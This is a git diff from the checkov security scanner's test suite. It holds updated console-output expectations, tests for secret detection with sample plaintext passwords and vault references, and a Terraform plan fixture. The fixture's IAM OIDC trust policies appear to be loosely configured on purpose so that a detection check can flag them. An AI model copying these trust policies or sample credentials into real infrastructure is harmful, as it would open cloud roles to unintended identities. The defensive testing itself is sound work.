             '\t┌──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┐\n',
@@ -92,7 +91,6 @@ def test_console_output(mocker, sca_package_2_report):
 def test_console_output_in_tty(mocker: MockerFixture, sca_package_2_report):
     # simulate a tty call by enforcing color
     mocker.patch.dict(os.environ, {"FORCE_COLOR": "True"})
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", True)
 
     console_output = sca_package_2_report.print_console(False, False, None, None, False)
 
@@ -120,11 +118,11 @@ def test_console_output_in_tty(mocker: MockerFixture, sca_package_2_report):
             '\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n',
             "\n",
             "\t/requirements.txt - Licenses Statuses:\n",
-            '\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n',
-            "\t│ Package name             │ Package version          │ Policy ID                │ License                  │ Status                    │\n",
-            '\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n',
-            '\t│ flask                    │ 0.6                      │ BC_LIC_1                 │ DUMMY_OTHER_LICENSE      │ FAILED                    │\n',
-            '\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n',
+            '\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n',
+            "\t│ Package name                   │ Package version                │ Policy ID                      │ License                            │\n",
+            '\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n',
+            '\t│ flask                          │ 0.6                            │ BC_LIC_1                       │ DUMMY_OTHER_LICENSE                │\n',
+            '\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n',
             "\n",
             "\t/path/to/go.sum - CVEs Summary:\n",
             '\t┌──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┬──────────────────────┐\n',
diff --git a/tests/secrets/sanity/iac_fp/main.json b/tests/secrets/sanity/iac_fp/main.json
new file mode 100644
index 00000000000..e8b2c4d4c2a
--- /dev/null
+++ b/tests/secrets/sanity/iac_fp/main.json
@@ -0,0 +1,3 @@
+{
+  "MetadataOptions": { "HttpsTokens": "optional" }
+}
\ No newline at end of file
diff --git a/tests/secrets/test_prioritise_secrets.py b/tests/secrets/test_prioritise_secrets.py
new file mode 100644
index 00000000000..77617d58725
--- /dev/null
+++ b/tests/secrets/test_prioritise_secrets.py
@@ -0,0 +1,68 @@
+import unittest
+
+from checkov.common.models.enums import CheckResult
+from checkov.common.output.secrets_record import SecretsRecord
+from checkov.secrets.runner import Runner, ENTROPY_CHECK_IDS, GENERIC_PRIVATE_KEY_CHECK_IDS
+
+
+class TestPrioritiseSecrets(unittest.TestCase):
+    def setUp(self):
+        self.secret_records = {
+            'key1': SecretsRecord(check_id='CKV_SECRET_6', check_name='foo',
+                                  check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')],
+                                  file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None,
+                                  check_class='CheckClass', file_abs_path='abs_path'),
+            'key2': SecretsRecord(check_id='CKV_SECRET_10', check_name='foo',
+                                  check_result={"result": CheckResult.FAILED},
+                                  code_block=[(1, 'baz')], file_path='qux', file_line_range=[1, 2], resource='resource',
+                                  evaluations=None, check_class='CheckClass', file_abs_path='abs_path'),
+            'key3': SecretsRecord(check_id='CKV_SECRET_18', check_name='foo',
+                                  check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')],
+                                  file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None,
+                                  check_class='CheckClass', file_abs_path='abs_path'),
+            'key4': SecretsRecord(check_id='CKV_SECRET_192', check_name='foo',
+                                  check_result={"result": CheckResult.FAILED}, code_block=[(1, 'baz')],
+                                  file_path='qux', file_line_range=[1, 2], resource='resource', evaluations=None,
+                                  check_class='CheckClass', file_abs_path='abs_path'),
+        }
+        self.ENTROPY_CHECK_IDS = ENTROPY_CHECK_IDS
+        self.GENERIC_PRIVATE_KEY_CHECK_IDS = GENERIC_PRIVATE_KEY_CHECK_IDS
+
+    def test_entropy_check_id_removed(self):
+        result = Runner._prioritise_secrets(self.secret_records, 'key1', 'CKV_SECRET_18')
+        self.assertTrue(result)
+        self.assertNotIn('key1', self.secret_records)
+
+    def test_generic_private_key_check_id_removed(self):
+        result = Runner._prioritise_secrets(self.secret_records, 'key2', 'CKV_SECRET_18')
+        self.assertTrue(result)
+        self.assertNotIn('key2', self.secret_records)
+
+    def test_generic_private_key_check_id_192_removed(self):
+        result = Runner._prioritise_secrets(self.secret_records, 'key4', 'CKV_SECRET_18')
+        self.assertTrue(result)
+        self.assertNotIn('key4', self.secret_records)
+
+    def test_no_removal_entropy_check_id(self):
+        result = Runner._prioritise_secrets(self.secret_records, 'key1', 'CKV_SECRET_6')
+        self.assertFalse(result)
+        self.assertIn('key1', self.secret_records)
+
+    def test_no_removal_generic_private_key_check_id(self):
+        result = Runner._prioritise_secrets(self.secret_records, 'key2', 'CKV_SECRET_10')
+        self.assertFalse(result)
+        self.assertIn('key2', self.secret_records)
+
+    def test_no_removal_generic_private_key_check_id_192(self):
+        result = Runner._prioritise_secrets(self.secret_records, 'key4', 'CKV_SECRET_192')
+        self.assertFalse(result)
+        self.assertIn('key4', self.secret_records)
+
+    def test_no_removal_other_check_id(self):
+        result = Runner._prioritise_secrets(self.secret_records, 'key3', 'CKV_SECRET_1000')
+        self.assertFalse(result)
+        self.assertIn('key3', self.secret_records)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/secrets/test_vault_secrets.py b/tests/secrets/test_vault_secrets.py
new file mode 100644
index 00000000000..e758fbc4aaa
--- /dev/null
+++ b/tests/secrets/test_vault_secrets.py
@@ -0,0 +1,21 @@
+from checkov.secrets.runner import should_filter_vault_secret
+
+HIGH_ENTROPY_CHECK_ID = 'CKV_SECRET_80'
+
+def test_vault_secrets_false_positives():
+    fp_secrets = [
+        'DB_RBMQ_PASSWORD: vault: secret/data/product-web/mcrp-qwr-v2/mabbot#PASSWORD',
+        'WEB_PASSWORD: vault: secret/data/product/fwrp-qe-v3/parme3#PASSWORD',
+        'PASS: vault: secret/sr/dt/pro/fwrtq1#2/weg#PASSWORD'
+    ]
+    for fp_secret in fp_secrets:
+        assert should_filter_vault_secret(fp_secret, HIGH_ENTROPY_CHECK_ID)
+
+def test_secrets_without_vault():
+    real_secrets = [
+        'ldap_pwd = k%udk423u4%P8=H_',
+        'password = J6T4ww+##14m',
+        'PS = 1r4#Gf2FDF$343r3m2me3r%'
+    ]
+    for real_secret in real_secrets:
+        assert not should_filter_vault_secret(real_secret, HIGH_ENTROPY_CHECK_ID)
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_GithubActionsOIDCTrustPolicy/tfplan.json b/tests/terraform/checks/data/aws/example_GithubActionsOIDCTrustPolicy/tfplan.json
new file mode 100644
index 00000000000..d148954eaf2
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_GithubActionsOIDCTrustPolicy/tfplan.json
@@ -0,0 +1,1605 @@
+{
+  "format_version": "1.2",
+  "terraform_version": "1.5.7",
+  "planned_values": {
+    "root_module": {
+      "child_modules": [
+        {
+          "resources": [
+            {
+              "address": "module.poc.aws_iam_openid_connect_provider.r5",
+              "mode": "managed",
+              "type": "aws_iam_openid_connect_provider",
+              "name": "r5",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "client_id_list": [
+                  "sts.amazonaws.com"
+                ],
+                "tags": null,
+                "tags_all": {
+                  "checkov_uid": "CKV_AWS_358",
+                  "environment": "test",
+                  "managed_by": "terraform"
+                },
+                "thumbprint_list": [
+                  "123"
+                ],
+                "url": "https://accounts.google.com"
+              },
+              "sensitive_values": {
+                "client_id_list": [
+                  false
+                ],
+                "tags_all": {},
+                "thumbprint_list": [
+                  false
+                ]
+              }
+            },
+            {
+              "address": "module.poc.aws_iam_role.r6[\"p1\"]",
+              "mode": "managed",
+              "type": "aws_iam_role",
+              "name": "r6",
+              "index": "p1",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "description": null,
+                "force_detach_policies": true,
+                "inline_policy": [
+                  {
+                    "name": "eks_s3_access",
+                    "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p1/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}"
+                  }
+                ],
+                "max_session_duration": 3600,
+                "name": "r8",
+                "path": "/",
+                "permissions_boundary": null,
+                "tags": null,
+                "tags_all": {
+                  "checkov_uid": "CKV_AWS_358",
+                  "environment": "test",
+                  "managed_by": "terraform"
+                }
+              },
+              "sensitive_values": {
+                "inline_policy": [
+                  {}
+                ],
+                "managed_policy_arns": [],
+                "tags_all": {}
+              }
+            },
+            {
+              "address": "module.poc.aws_iam_role.r6[\"p2\"]",
+              "mode": "managed",
+              "type": "aws_iam_role",
+              "name": "r6",
+              "index": "p2",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "description": null,
+                "force_detach_policies": true,
+                "inline_policy": [
+                  {
+                    "name": "eks_s3_access",
+                    "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p2/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}"
+                  }
+                ],
+                "max_session_duration": 3600,
+                "name": "r9",
+                "path": "/",
+                "permissions_boundary": null,
+                "tags": null,
+                "tags_all": {
+                  "checkov_uid": "CKV_AWS_358",
+                  "environment": "test",
+                  "managed_by": "terraform"
+                }
+              },
+              "sensitive_values": {
+                "inline_policy": [
+                  {}
+                ],
+                "managed_policy_arns": [],
+                "tags_all": {}
+              }
+            },
+            {
+              "address": "module.poc.aws_iam_role.r1[\"p1\"]",
+              "mode": "managed",
+              "type": "aws_iam_role",
+              "name": "r1",
+              "index": "p1",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "description": null,
+                "force_detach_policies": true,
+                "inline_policy": [
+                  {
+                    "name": "eks_s3_access",
+                    "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p1/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}"
+                  }
+                ],
+                "max_session_duration": 3600,
+                "name": "r7",
+                "path": "/",
+                "permissions_boundary": null,
+                "tags": null,
+                "tags_all": {
+                  "checkov_uid": "CKV_AWS_358",
+                  "environment": "test",
+                  "managed_by": "terraform"
+                }
+              },
+              "sensitive_values": {
+                "inline_policy": [
+                  {}
+                ],
+                "managed_policy_arns": [],
+                "tags_all": {}
+              }
+            },
+            {
+              "address": "module.poc.aws_iam_role.r1[\"p2\"]",
+              "mode": "managed",
+              "type": "aws_iam_role",
+              "name": "r1",
+              "index": "p2",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "description": null,
+                "force_detach_policies": true,
+                "inline_policy": [
+                  {
+                    "name": "eks_s3_access",
+                    "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p2/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}"
+                  }
+                ],
+                "max_session_duration": 3600,
+                "name": "r2",
+                "path": "/",
+                "permissions_boundary": null,
+                "tags": null,
+                "tags_all": {
+                  "checkov_uid": "CKV_AWS_358",
+                  "environment": "test",
+                  "managed_by": "terraform"
+                }
+              },
+              "sensitive_values": {
+                "inline_policy": [
+                  {}
+                ],
+                "managed_policy_arns": [],
+                "tags_all": {}
+              }
+            },
+            {
+              "address": "module.poc.data.aws_iam_policy_document.r4[\"p1\"]",
+              "mode": "data",
+              "type": "aws_iam_policy_document",
+              "name": "r4",
+              "index": "p1",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "override_json": null,
+                "override_policy_documents": null,
+                "policy_id": null,
+                "source_json": null,
+                "source_policy_documents": null,
+                "statement": [
+                  {
+                    "actions": [
+                      "sts:AssumeRoleWithWebIdentity"
+                    ],
+                    "condition": [
+                      {
+                        "test": "StringEquals",
+                        "values": [
+                          "sts.amazonaws.com"
+                        ],
+                        "variable": "accounts.google.com:aud"
+                      },
+                      {
+                        "test": "StringEquals",
+                        "values": [
+                          "system:serviceaccount:p1:default"
+                        ],
+                        "variable": "accounts.google.com:sub"
+                      }
+                    ],
+                    "effect": "Allow",
+                    "not_actions": null,
+                    "not_principals": [],
+                    "not_resources": null,
+                    "principals": [
+                      {
+                        "identifiers": [
+                          "cognito-identity.amazonaws.com"
+                        ],
+                        "type": "Federated"
+                      }
+                    ],
+                    "resources": null,
+                    "sid": null
+                  }
+                ],
+                "version": null
+              },
+              "sensitive_values": {
+                "statement": [
+                  {
+                    "actions": [
+                      false
+                    ],
+                    "condition": [
+                      {
+                        "values": [
+                          false
+                        ]
+                      },
+                      {
+                        "values": [
+                          false
+                        ]
+                      }
+                    ],
+                    "not_principals": [],
+                    "principals": [
+                      {
+                        "identifiers": [
+                          false
+                        ]
+                      }
+                    ]
+                  }
+                ]
+              }
+            },
+            {
+              "address": "module.poc.data.aws_iam_policy_document.r4[\"p2\"]",
+              "mode": "data",
+              "type": "aws_iam_policy_document",
+              "name": "r4",
+              "index": "p2",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "override_json": null,
+                "override_policy_documents": null,
+                "policy_id": null,
+                "source_json": null,
+                "source_policy_documents": null,
+                "statement": [
+                  {
+                    "actions": [
+                      "sts:AssumeRoleWithWebIdentity"
+                    ],
+                    "condition": [
+                      {
+                        "test": "StringEquals",
+                        "values": [
+                          "sts.amazonaws.com"
+                        ],
+                        "variable": "accounts.google.com:aud"
+                      },
+                      {
+                        "test": "StringEquals",
+                        "values": [
+                          "system:serviceaccount:p2:default"
+                        ],
+                        "variable": "accounts.google.com:sub"
+                      }
+                    ],
+                    "effect": "Allow",
+                    "not_actions": null,
+                    "not_principals": [],
+                    "not_resources": null,
+                    "principals": [
+                      {
+                        "identifiers": [
+                          "cognito-identity.amazonaws.com"
+                        ],
+                        "type": "Federated"
+                      }
+                    ],
+                    "resources": null,
+                    "sid": null
+                  }
+                ],
+                "version": null
+              },
+              "sensitive_values": {
+                "statement": [
+                  {
+                    "actions": [
+                      false
+                    ],
+                    "condition": [
+                      {
+                        "values": [
+                          false
+                        ]
+                      },
+                      {
+                        "values": [
+                          false
+                        ]
+                      }
+                    ],
+                    "not_principals": [],
+                    "principals": [
+                      {
+                        "identifiers": [
+                          false
+                        ]
+                      }
+                    ]
+                  }
+                ]
+              }
+            },
+            {
+              "address": "module.poc.data.aws_iam_policy_document.r3[\"p1\"]",
+              "mode": "data",
+              "type": "aws_iam_policy_document",
+              "name": "r3",
+              "index": "p1",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "override_json": null,
+                "override_policy_documents": null,
+                "policy_id": null,
+                "source_json": null,
+                "source_policy_documents": null,
+                "statement": [
+                  {
+                    "actions": [
+                      "sts:AssumeRoleWithWebIdentity"
+                    ],
+                    "condition": [
+                      {
+                        "test": "StringEquals",
+                        "values": [
+                          "sts.amazonaws.com"
+                        ],
+                        "variable": "accounts.google.com:aud"
+                      },
+                      {
+                        "test": "StringEquals",
+                        "values": [
+                          "system:serviceaccount:p1:default"
+                        ],
+                        "variable": "accounts.google.com:sub"
+                      }
+                    ],
+                    "effect": "Allow",
+                    "not_actions": null,
+                    "not_principals": [],
+                    "not_resources": null,
+                    "principals": [
+                      {
+                        "identifiers": [
+                          null
+                        ],
+                        "type": "Federated"
+                      }
+                    ],
+                    "resources": null,
+                    "sid": null
+                  }
+                ],
+                "version": null
+              },
+              "sensitive_values": {
+                "statement": [
+                  {
+                    "actions": [
+                      false
+                    ],
+                    "condition": [
+                      {
+                        "values": [
+                          false
+                        ]
+                      },
+                      {
+                        "values": [
+                          false
+                        ]
+                      }
+                    ],
+                    "not_principals": [],
+                    "principals": [
+                      {
+                        "identifiers": [
+                          false
+                        ]
+                      }
+                    ]
+                  }
+                ]
+              }
+            },
+            {
+              "address": "module.poc.data.aws_iam_policy_document.r3[\"p2\"]",
+              "mode": "data",
+              "type": "aws_iam_policy_document",
+              "name": "r3",
+              "index": "p2",
+              "provider_name": "registry.terraform.io/hashicorp/aws",
+              "schema_version": 0,
+              "values": {
+                "override_json": null,
+                "override_policy_documents": null,
+                "policy_id": null,
+                "source_json": null,
+                "source_policy_documents": null,
+                "statement": [
+                  {
+                    "actions": [
+                      "sts:AssumeRoleWithWebIdentity"
+                    ],
+                    "condition": [
+                      {
+                        "test": "StringEquals",
+                        "values": [
+                          "sts.amazonaws.com"
+                        ],
+                        "variable": "accounts.google.com:aud"
+                      },
+                      {
+                        "test": "StringEquals",
+                        "values": [
+                          "system:serviceaccount:p2:default"
+                        ],
+                        "variable": "accounts.google.com:sub"
+                      }
+                    ],
+                    "effect": "Allow",
+                    "not_actions": null,
+                    "not_principals": [],
+                    "not_resources": null,
+                    "principals": [
+                      {
+                        "identifiers": [
+                          null
+                        ],
+                        "type": "Federated"
+                      }
+                    ],
+                    "resources": null,
+                    "sid": null
+                  }
+                ],
+                "version": null
+              },
+              "sensitive_values": {
+                "statement": [
+                  {
+                    "actions": [
+                      false
+                    ],
+                    "condition": [
+                      {
+                        "values": [
+                          false
+                        ]
+                      },
+                      {
+                        "values": [
+                          false
+                        ]
+                      }
+                    ],
+                    "not_principals": [],
+                    "principals": [
+                      {
+                        "identifiers": [
+                          false
+                        ]
+                      }
+                    ]
+                  }
+                ]
+              }
+            }
+          ],
+          "address": "module.poc"
+        }
+      ]
+    }
+  },
+  "resource_changes": [
+    {
+      "address": "module.poc.data.aws_iam_policy_document.r4[\"p1\"]",
+      "module_address": "module.poc",
+      "mode": "data",
+      "type": "aws_iam_policy_document",
+      "name": "r4",
+      "index": "p1",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "read"
+        ],
+        "before": null,
+        "after": {
+          "override_json": null,
+          "override_policy_documents": null,
+          "policy_id": null,
+          "source_json": null,
+          "source_policy_documents": null,
+          "statement": [
+            {
+              "actions": [
+                "sts:AssumeRoleWithWebIdentity"
+              ],
+              "condition": [
+                {
+                  "test": "StringEquals",
+                  "values": [
+                    "sts.amazonaws.com"
+                  ],
+                  "variable": "accounts.google.com:aud"
+                },
+                {
+                  "test": "StringEquals",
+                  "values": [
+                    "system:serviceaccount:p1:default"
+                  ],
+                  "variable": "accounts.google.com:sub"
+                }
+              ],
+              "effect": "Allow",
+              "not_actions": null,
+              "not_principals": [],
+              "not_resources": null,
+              "principals": [
+                {
+                  "identifiers": [
+                    "cognito-identity.amazonaws.com"
+                  ],
+                  "type": "Federated"
+                }
+              ],
+              "resources": null,
+              "sid": null
+            }
+          ],
+          "version": null
+        },
+        "after_unknown": {
+          "id": true,
+          "json": true,
+          "statement": [
+            {
+              "actions": [
+                false
+              ],
+              "condition": [
+                {
+                  "values": [
+                    false
+                  ]
+                },
+                {
+                  "values": [
+                    false
+                  ]
+                }
+              ],
+              "not_principals": [],
+              "principals": [
+                {
+                  "identifiers": [
+                    false
+                  ]
+                }
+              ]
+            }
+          ]
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "statement": [
+            {
+              "actions": [
+                false
+              ],
+              "condition": [
+                {
+                  "values": [
+                    false
+                  ]
+                },
+                {
+                  "values": [
+                    false
+                  ]
+                }
+              ],
+              "not_principals": [],
+              "principals": [
+                {
+                  "identifiers": [
+                    false
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      },
+      "action_reason": "read_because_dependency_pending"
+    },
+    {
+      "address": "module.poc.data.aws_iam_policy_document.r4[\"p2\"]",
+      "module_address": "module.poc",
+      "mode": "data",
+      "type": "aws_iam_policy_document",
+      "name": "r4",
+      "index": "p2",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "read"
+        ],
+        "before": null,
+        "after": {
+          "override_json": null,
+          "override_policy_documents": null,
+          "policy_id": null,
+          "source_json": null,
+          "source_policy_documents": null,
+          "statement": [
+            {
+              "actions": [
+                "sts:AssumeRoleWithWebIdentity"
+              ],
+              "condition": [
+                {
+                  "test": "StringEquals",
+                  "values": [
+                    "sts.amazonaws.com"
+                  ],
+                  "variable": "accounts.google.com:aud"
+                },
+                {
+                  "test": "StringEquals",
+                  "values": [
+                    "system:serviceaccount:p2:default"
+                  ],
+                  "variable": "accounts.google.com:sub"
+                }
+              ],
+              "effect": "Allow",
+              "not_actions": null,
+              "not_principals": [],
+              "not_resources": null,
+              "principals": [
+                {
+                  "identifiers": [
+                    "cognito-identity.amazonaws.com"
+                  ],
+                  "type": "Federated"
+                }
+              ],
+              "resources": null,
+              "sid": null
+            }
+          ],
+          "version": null
+        },
+        "after_unknown": {
+          "id": true,
+          "json": true,
+          "statement": [
+            {
+              "actions": [
+                false
+              ],
+              "condition": [
+                {
+                  "values": [
+                    false
+                  ]
+                },
+                {
+                  "values": [
+                    false
+                  ]
+                }
+              ],
+              "not_principals": [],
+              "principals": [
+                {
+                  "identifiers": [
+                    false
+                  ]
+                }
+              ]
+            }
+          ]
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "statement": [
+            {
+              "actions": [
+                false
+              ],
+              "condition": [
+                {
+                  "values": [
+                    false
+                  ]
+                },
+                {
+                  "values": [
+                    false
+                  ]
+                }
+              ],
+              "not_principals": [],
+              "principals": [
+                {
+                  "identifiers": [
+                    false
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      },
+      "action_reason": "read_because_dependency_pending"
+    },
+    {
+      "address": "module.poc.data.aws_iam_policy_document.r3[\"p1\"]",
+      "module_address": "module.poc",
+      "mode": "data",
+      "type": "aws_iam_policy_document",
+      "name": "r3",
+      "index": "p1",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "read"
+        ],
+        "before": null,
+        "after": {
+          "override_json": null,
+          "override_policy_documents": null,
+          "policy_id": null,
+          "source_json": null,
+          "source_policy_documents": null,
+          "statement": [
+            {
+              "actions": [
+                "sts:AssumeRoleWithWebIdentity"
+              ],
+              "condition": [
+                {
+                  "test": "StringEquals",
+                  "values": [
+                    "sts.amazonaws.com"
+                  ],
+                  "variable": "accounts.google.com:aud"
+                },
+                {
+                  "test": "StringEquals",
+                  "values": [
+                    "system:serviceaccount:p1:default"
+                  ],
+                  "variable": "accounts.google.com:sub"
+                }
+              ],
+              "effect": "Allow",
+              "not_actions": null,
+              "not_principals": [],
+              "not_resources": null,
+              "principals": [
+                {
+                  "identifiers": [
+                    null
+                  ],
+                  "type": "Federated"
+                }
+              ],
+              "resources": null,
+              "sid": null
+            }
+          ],
+          "version": null
+        },
+        "after_unknown": {
+          "id": true,
+          "json": true,
+          "statement": [
+            {
+              "actions": [
+                false
+              ],
+              "condition": [
+                {
+                  "values": [
+                    false
+                  ]
+                },
+                {
+                  "values": [
+                    false
+                  ]
+                }
+              ],
+              "not_principals": [],
+              "principals": [
+                {
+                  "identifiers": [
+                    true
+                  ]
+                }
+              ]
+            }
+          ]
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "statement": [
+            {
+              "actions": [
+                false
+              ],
+              "condition": [
+                {
+                  "values": [
+                    false
+                  ]
+                },
+                {
+                  "values": [
+                    false
+                  ]
+                }
+              ],
+              "not_principals": [],
+              "principals": [
+                {
+                  "identifiers": [
+                    false
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      },
+      "action_reason": "read_because_config_unknown"
+    },
+    {
+      "address": "module.poc.data.aws_iam_policy_document.r3[\"p2\"]",
+      "module_address": "module.poc",
+      "mode": "data",
+      "type": "aws_iam_policy_document",
+      "name": "r3",
+      "index": "p2",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "read"
+        ],
+        "before": null,
+        "after": {
+          "override_json": null,
+          "override_policy_documents": null,
+          "policy_id": null,
+          "source_json": null,
+          "source_policy_documents": null,
+          "statement": [
+            {
+              "actions": [
+                "sts:AssumeRoleWithWebIdentity"
+              ],
+              "condition": [
+                {
+                  "test": "StringEquals",
+                  "values": [
+                    "sts.amazonaws.com"
+                  ],
+                  "variable": "accounts.google.com:aud"
+                },
+                {
+                  "test": "StringEquals",
+                  "values": [
+                    "system:serviceaccount:p2:default"
+                  ],
+                  "variable": "accounts.google.com:sub"
+                }
+              ],
+              "effect": "Allow",
+              "not_actions": null,
+              "not_principals": [],
+              "not_resources": null,
+              "principals": [
+                {
+                  "identifiers": [
+                    null
+                  ],
+                  "type": "Federated"
+                }
+              ],
+              "resources": null,
+              "sid": null
+            }
+          ],
+          "version": null
+        },
+        "after_unknown": {
+          "id": true,
+          "json": true,
+          "statement": [
+            {
+              "actions": [
+                false
+              ],
+              "condition": [
+                {
+                  "values": [
+                    false
+                  ]
+                },
+                {
+                  "values": [
+                    false
+                  ]
+                }
+              ],
+              "not_principals": [],
+              "principals": [
+                {
+                  "identifiers": [
+                    true
+                  ]
+                }
+              ]
+            }
+          ]
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "statement": [
+            {
+              "actions": [
+                false
+              ],
+              "condition": [
+                {
+                  "values": [
+                    false
+                  ]
+                },
+                {
+                  "values": [
+                    false
+                  ]
+                }
+              ],
+              "not_principals": [],
+              "principals": [
+                {
+                  "identifiers": [
+                    false
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      },
+      "action_reason": "read_because_config_unknown"
+    },
+    {
+      "address": "module.poc.aws_iam_openid_connect_provider.r5",
+      "module_address": "module.poc",
+      "mode": "managed",
+      "type": "aws_iam_openid_connect_provider",
+      "name": "r5",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "create"
+        ],
+        "before": null,
+        "after": {
+          "client_id_list": [
+            "sts.amazonaws.com"
+          ],
+          "tags": null,
+          "tags_all": {
+            "checkov_uid": "CKV_AWS_358",
+            "environment": "test",
+            "managed_by": "terraform"
+          },
+          "thumbprint_list": [
+            "cf23df2207d99a74fbe169e3eba035e633b65d94"
+          ],
+          "url": "https://accounts.google.com"
+        },
+        "after_unknown": {
+          "arn": true,
+          "client_id_list": [
+            false
+          ],
+          "id": true,
+          "tags_all": {},
+          "thumbprint_list": [
+            false
+          ]
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "client_id_list": [
+            false
+          ],
+          "tags_all": {},
+          "thumbprint_list": [
+            false
+          ]
+        }
+      }
+    },
+    {
+      "address": "module.poc.aws_iam_role.r6[\"p1\"]",
+      "module_address": "module.poc",
+      "mode": "managed",
+      "type": "aws_iam_role",
+      "name": "r6",
+      "index": "p1",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "create"
+        ],
+        "before": null,
+        "after": {
+          "description": null,
+          "force_detach_policies": true,
+          "inline_policy": [
+            {
+              "name": "eks_s3_access",
+              "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p1/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}"
+            }
+          ],
+          "max_session_duration": 3600,
+          "name": "r8",
+          "path": "/",
+          "permissions_boundary": null,
+          "tags": null,
+          "tags_all": {
+            "checkov_uid": "CKV_AWS_358",
+            "environment": "test",
+            "managed_by": "terraform"
+          }
+        },
+        "after_unknown": {
+          "arn": true,
+          "assume_role_policy": true,
+          "create_date": true,
+          "id": true,
+          "inline_policy": [
+            {}
+          ],
+          "managed_policy_arns": true,
+          "name_prefix": true,
+          "tags_all": {},
+          "unique_id": true
+        },
+        "before_sensitive": false,
+        "after_sensitive": {
+          "inline_policy": [
+            {}
+          ],
+          "managed_policy_arns": [],
+          "tags_all": {}
+        }
+      }
+    },
+    {
+      "address": "module.poc.aws_iam_role.r6[\"p2\"]",
+      "module_address": "module.poc",
+      "mode": "managed",
+      "type": "aws_iam_role",
+      "name": "r6",
+      "index": "p2",
+      "provider_name": "registry.terraform.io/hashicorp/aws",
+      "change": {
+        "actions": [
+          "create"
+        ],
+        "before": null,
+        "after": {
+          "description": null,
+          "force_detach_policies": true,
+          "inline_policy": [
+            {
+              "name": "eks_s3_access",
+              "policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Action\":[\"s3:ListBucket\"],\"Condition\":{\"StringLike\":{\"s3:prefix\":[\"p2/*\"]}},\"Effect\":\"Allow\",\"Resource\":[\"arn:aws:s3:::\"],\"Sid\":\"AllowListingOfUserFolder\"}]}"
+            }
+          ],
+          "max_session_duration": 3600,
+          "name": "r9",
+          "path": "/",
+          "permissions_boundary": null,
+          "tags": null,
+          "tags_all": {
+            "checkov_uid": "CKV_AWS_358",
+            "environment": "test",
+            "managed_by": "terraform"
+          }
+        },
